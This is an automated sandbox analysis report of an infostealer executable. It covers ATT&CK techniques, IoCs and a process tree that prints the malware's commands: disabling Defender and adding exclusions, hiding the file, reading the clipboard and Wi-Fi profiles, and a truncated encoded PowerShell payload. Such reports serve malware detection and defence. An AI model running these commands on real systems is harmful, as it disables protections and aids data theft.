8b772ab3db8482d2996c55a58f950c5714f2f3187ed5a0aa9bfa1d71a904394d

Analysis

max time kernel
80s
max time network
71s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-11-2024 17:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client.exe
Size

7.0MB
MD5

2f43d99d1c2ee98579ca31b40af1fa14
SHA1

833ac8b9357382f4014aa48d6ef666120c8765ca
SHA256

8b772ab3db8482d2996c55a58f950c5714f2f3187ed5a0aa9bfa1d71a904394d
SHA512

a432798c462390f48eb80937af8ee3239346fa863b0e367b9947a7bbd02eb67042daed2455b45701b534c0061ed3f58b4760bb7e79bb158cb2ba293da8d9ea71
SSDEEP

196608:gYwWsbT/9eHLz3wIs1zdmLY9OqBdsFhH1EU:vsbTl03fs1JMY9OqBdsFhHr

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2236 powershell.exe
3904 powershell.exe
1464 powershell.exe
3472 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

Client.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts Client.exe
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
collection

Clipboard Data
T1115

Processes:

cmd.exepowershell.exe

pid process

1848 cmd.exe
1672 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Camera.exerar.exe

pid process

3892 Camera.exe
816 rar.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Client.exe

pid	process
1848	cmd.exe
1672	powershell.exe

pid	process
3892	Camera.exe
816	rar.exe

Loads dropped DLL 18 IoCs

Processes:

Client.exe

pid	process
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe
3984	Client.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 ip-api.com
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates processes with tasklist 1 TTPs 5 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

1652 tasklist.exe
2336 tasklist.exe
3248 tasklist.exe
5008 tasklist.exe
2144 tasklist.exe
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
defense_evasion

Hidden Files and Directories
T1564.001

Processes:

cmd.exe

pid process

1196 cmd.exe

flow	ioc
9	ip-api.com

pid	process
1652	tasklist.exe
2336	tasklist.exe
3248	tasklist.exe
5008	tasklist.exe
2144	tasklist.exe

pid	process
1196	cmd.exe

UPX packed file 43 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI10642\python311.dll	upx
behavioral1/memory/3984-25-0x00007FFC09FA0000-0x00007FFC0A589000-memory.dmp	upx
behavioral1/memory/3984-33-0x00007FFC120D0000-0x00007FFC120E0000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\libffi-8.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\tinyaes.cp311-win_amd64.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\_lzma.pyd	upx
behavioral1/memory/3984-39-0x00007FFC0EA10000-0x00007FFC0EA3D000-memory.dmp	upx
behavioral1/memory/3984-37-0x00007FFC120C0000-0x00007FFC120CF000-memory.dmp	upx
behavioral1/memory/3984-34-0x00007FFC0F500000-0x00007FFC0F523000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\sqlite3.dll	upx
behavioral1/memory/3984-48-0x00007FFC0ACF0000-0x00007FFC0AD13000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\_socket.pyd	upx
behavioral1/memory/3984-53-0x00007FFC0EBD0000-0x00007FFC0EBE9000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\libcrypto-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\libssl-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\_hashlib.pyd	upx
behavioral1/memory/3984-73-0x00007FFC0F550000-0x00007FFC0F55D000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\unicodedata.pyd	upx
behavioral1/memory/3984-76-0x00007FFC0A770000-0x00007FFC0A88C000-memory.dmp	upx
behavioral1/memory/3984-72-0x00007FFC0AB40000-0x00007FFC0AB54000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\_queue.pyd	upx
behavioral1/memory/3984-70-0x00007FFC0F500000-0x00007FFC0F523000-memory.dmp	upx
behavioral1/memory/3984-66-0x00007FFC0A950000-0x00007FFC0AA08000-memory.dmp	upx
behavioral1/memory/3984-64-0x00007FFBFB650000-0x00007FFBFB9C8000-memory.dmp	upx
behavioral1/memory/3984-62-0x00007FFC09FA0000-0x00007FFC0A589000-memory.dmp	upx
behavioral1/memory/3984-63-0x00007FFC0AC90000-0x00007FFC0ACBE000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\_ssl.pyd	upx
behavioral1/memory/3984-54-0x00007FFC0F750000-0x00007FFC0F75D000-memory.dmp	upx
behavioral1/memory/3984-96-0x00007FFBFB9D0000-0x00007FFBFBB47000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI10642\select.pyd	upx
behavioral1/memory/3984-47-0x00007FFBFB9D0000-0x00007FFBFBB47000-memory.dmp	upx
behavioral1/memory/3984-46-0x00007FFC10690000-0x00007FFC106A9000-memory.dmp	upx
behavioral1/memory/3984-104-0x00007FFC0ACF0000-0x00007FFC0AD13000-memory.dmp	upx
behavioral1/memory/3984-126-0x00007FFC0EBD0000-0x00007FFC0EBE9000-memory.dmp	upx
behavioral1/memory/3984-141-0x00007FFC0AC90000-0x00007FFC0ACBE000-memory.dmp	upx
behavioral1/memory/3984-142-0x00007FFBFB650000-0x00007FFBFB9C8000-memory.dmp	upx
behavioral1/memory/3984-172-0x00007FFC0A950000-0x00007FFC0AA08000-memory.dmp	upx
behavioral1/memory/3984-286-0x00007FFC0F500000-0x00007FFC0F523000-memory.dmp	upx
behavioral1/memory/3984-291-0x00007FFBFB9D0000-0x00007FFBFBB47000-memory.dmp	upx
behavioral1/memory/3984-284-0x00007FFC09FA0000-0x00007FFC0A589000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

Camera.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Camera.exe
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
discovery

Wi-Fi Discovery
T1016.002

Processes:

cmd.exenetsh.exe

pid process

1304 cmd.exe
3712 netsh.exe
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exe

pid process

1920 WMIC.exe
224 WMIC.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

4964 systeminfo.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2896 reg.exe
Runs net.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Camera.exe

pid	process
1304	cmd.exe
3712	netsh.exe

pid	process
1920	WMIC.exe
224	WMIC.exe

pid	process
4964	systeminfo.exe

pid	process
2896	reg.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2236	powershell.exe
1464	powershell.exe
1464	powershell.exe
2236	powershell.exe
3472	powershell.exe
1672	powershell.exe
1672	powershell.exe
3472	powershell.exe
3472	powershell.exe
3964	powershell.exe
3964	powershell.exe
1672	powershell.exe
3964	powershell.exe
3904	powershell.exe
3904	powershell.exe
1848	powershell.exe
1848	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exepowershell.exepowershell.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1652	tasklist.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeIncreaseQuotaPrivilege	3968	WMIC.exe
Token: SeSecurityPrivilege	3968	WMIC.exe
Token: SeTakeOwnershipPrivilege	3968	WMIC.exe
Token: SeLoadDriverPrivilege	3968	WMIC.exe
Token: SeSystemProfilePrivilege	3968	WMIC.exe
Token: SeSystemtimePrivilege	3968	WMIC.exe
Token: SeProfSingleProcessPrivilege	3968	WMIC.exe
Token: SeIncBasePriorityPrivilege	3968	WMIC.exe
Token: SeCreatePagefilePrivilege	3968	WMIC.exe
Token: SeBackupPrivilege	3968	WMIC.exe
Token: SeRestorePrivilege	3968	WMIC.exe
Token: SeShutdownPrivilege	3968	WMIC.exe
Token: SeDebugPrivilege	3968	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3968	WMIC.exe
Token: SeRemoteShutdownPrivilege	3968	WMIC.exe
Token: SeUndockPrivilege	3968	WMIC.exe
Token: SeManageVolumePrivilege	3968	WMIC.exe
Token: 33	3968	WMIC.exe
Token: 34	3968	WMIC.exe
Token: 35	3968	WMIC.exe
Token: 36	3968	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3968	WMIC.exe
Token: SeSecurityPrivilege	3968	WMIC.exe
Token: SeTakeOwnershipPrivilege	3968	WMIC.exe
Token: SeLoadDriverPrivilege	3968	WMIC.exe
Token: SeSystemProfilePrivilege	3968	WMIC.exe
Token: SeSystemtimePrivilege	3968	WMIC.exe
Token: SeProfSingleProcessPrivilege	3968	WMIC.exe
Token: SeIncBasePriorityPrivilege	3968	WMIC.exe
Token: SeCreatePagefilePrivilege	3968	WMIC.exe
Token: SeBackupPrivilege	3968	WMIC.exe
Token: SeRestorePrivilege	3968	WMIC.exe
Token: SeShutdownPrivilege	3968	WMIC.exe
Token: SeDebugPrivilege	3968	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3968	WMIC.exe
Token: SeRemoteShutdownPrivilege	3968	WMIC.exe
Token: SeUndockPrivilege	3968	WMIC.exe
Token: SeManageVolumePrivilege	3968	WMIC.exe
Token: 33	3968	WMIC.exe
Token: 34	3968	WMIC.exe
Token: 35	3968	WMIC.exe
Token: 36	3968	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1920	WMIC.exe
Token: SeSecurityPrivilege	1920	WMIC.exe
Token: SeTakeOwnershipPrivilege	1920	WMIC.exe
Token: SeLoadDriverPrivilege	1920	WMIC.exe
Token: SeSystemProfilePrivilege	1920	WMIC.exe
Token: SeSystemtimePrivilege	1920	WMIC.exe
Token: SeProfSingleProcessPrivilege	1920	WMIC.exe
Token: SeIncBasePriorityPrivilege	1920	WMIC.exe
Token: SeCreatePagefilePrivilege	1920	WMIC.exe
Token: SeBackupPrivilege	1920	WMIC.exe
Token: SeRestorePrivilege	1920	WMIC.exe
Token: SeShutdownPrivilege	1920	WMIC.exe
Token: SeDebugPrivilege	1920	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1920	WMIC.exe
Token: SeRemoteShutdownPrivilege	1920	WMIC.exe
Token: SeUndockPrivilege	1920	WMIC.exe
Token: SeManageVolumePrivilege	1920	WMIC.exe
Token: 33	1920	WMIC.exe
Token: 34	1920	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Client.exeClient.execmd.exenet.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1064 wrote to memory of 3984	1064	Client.exe	Client.exe
PID 1064 wrote to memory of 3984	1064	Client.exe	Client.exe
PID 3984 wrote to memory of 3900	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 3900	3984	Client.exe	cmd.exe
PID 3900 wrote to memory of 2424	3900	cmd.exe	net.exe
PID 3900 wrote to memory of 2424	3900	cmd.exe	net.exe
PID 2424 wrote to memory of 4460	2424	net.exe	net1.exe
PID 2424 wrote to memory of 4460	2424	net.exe	net1.exe
PID 3984 wrote to memory of 4712	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 4712	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 3712	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 3712	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 452	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 452	3984	Client.exe	cmd.exe
PID 452 wrote to memory of 1652	452	cmd.exe	tasklist.exe
PID 452 wrote to memory of 1652	452	cmd.exe	tasklist.exe
PID 4712 wrote to memory of 1464	4712	cmd.exe	powershell.exe
PID 4712 wrote to memory of 1464	4712	cmd.exe	powershell.exe
PID 3712 wrote to memory of 2236	3712	cmd.exe	powershell.exe
PID 3712 wrote to memory of 2236	3712	cmd.exe	powershell.exe
PID 3984 wrote to memory of 4548	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 4548	3984	Client.exe	cmd.exe
PID 4548 wrote to memory of 3968	4548	cmd.exe	WMIC.exe
PID 4548 wrote to memory of 3968	4548	cmd.exe	WMIC.exe
PID 3984 wrote to memory of 2428	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 2428	3984	Client.exe	cmd.exe
PID 2428 wrote to memory of 3876	2428	cmd.exe	reg.exe
PID 2428 wrote to memory of 3876	2428	cmd.exe	reg.exe
PID 3984 wrote to memory of 1656	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 1656	3984	Client.exe	cmd.exe
PID 1656 wrote to memory of 2260	1656	cmd.exe	reg.exe
PID 1656 wrote to memory of 2260	1656	cmd.exe	reg.exe
PID 3984 wrote to memory of 5056	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 5056	3984	Client.exe	cmd.exe
PID 5056 wrote to memory of 1920	5056	cmd.exe	WMIC.exe
PID 5056 wrote to memory of 1920	5056	cmd.exe	WMIC.exe
PID 3984 wrote to memory of 5080	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 5080	3984	Client.exe	cmd.exe
PID 5080 wrote to memory of 224	5080	cmd.exe	WMIC.exe
PID 5080 wrote to memory of 224	5080	cmd.exe	WMIC.exe
PID 3984 wrote to memory of 1196	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 1196	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 2500	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 2500	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 3972	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 3972	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 1268	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 1268	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 4324	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 4324	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 4212	3984	Client.exe	tree.com
PID 3984 wrote to memory of 4212	3984	Client.exe	tree.com
PID 2500 wrote to memory of 3472	2500	cmd.exe	powershell.exe
PID 2500 wrote to memory of 3472	2500	cmd.exe	powershell.exe
PID 3984 wrote to memory of 1848	3984	Client.exe	powershell.exe
PID 3984 wrote to memory of 1848	3984	Client.exe	powershell.exe
PID 1196 wrote to memory of 3500	1196	cmd.exe	attrib.exe
PID 1196 wrote to memory of 3500	1196	cmd.exe	attrib.exe
PID 4212 wrote to memory of 388	4212	cmd.exe	WMIC.exe
PID 4212 wrote to memory of 388	4212	cmd.exe	WMIC.exe
PID 3972 wrote to memory of 2336	3972	cmd.exe	tasklist.exe
PID 3972 wrote to memory of 2336	3972	cmd.exe	tasklist.exe
PID 3984 wrote to memory of 2788	3984	Client.exe	cmd.exe
PID 3984 wrote to memory of 2788	3984	Client.exe	cmd.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

3500 attrib.exe

pid	process
3500	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1064
- C:\Users\Admin\AppData\Local\Temp\Client.exe
  "C:\Users\Admin\AppData\Local\Temp\Client.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "net session"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3900
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2424
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Client.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Client.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:452
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5080
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Client.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1196
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      4⤵
      Views/modifies file attributes
      PID:3500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3972
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:1268
  - - C:\Windows\system32\reg.exe
      reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
      4⤵
      Modifies registry key
      PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4324
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4212
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2788
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3560
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1304
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4888
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIA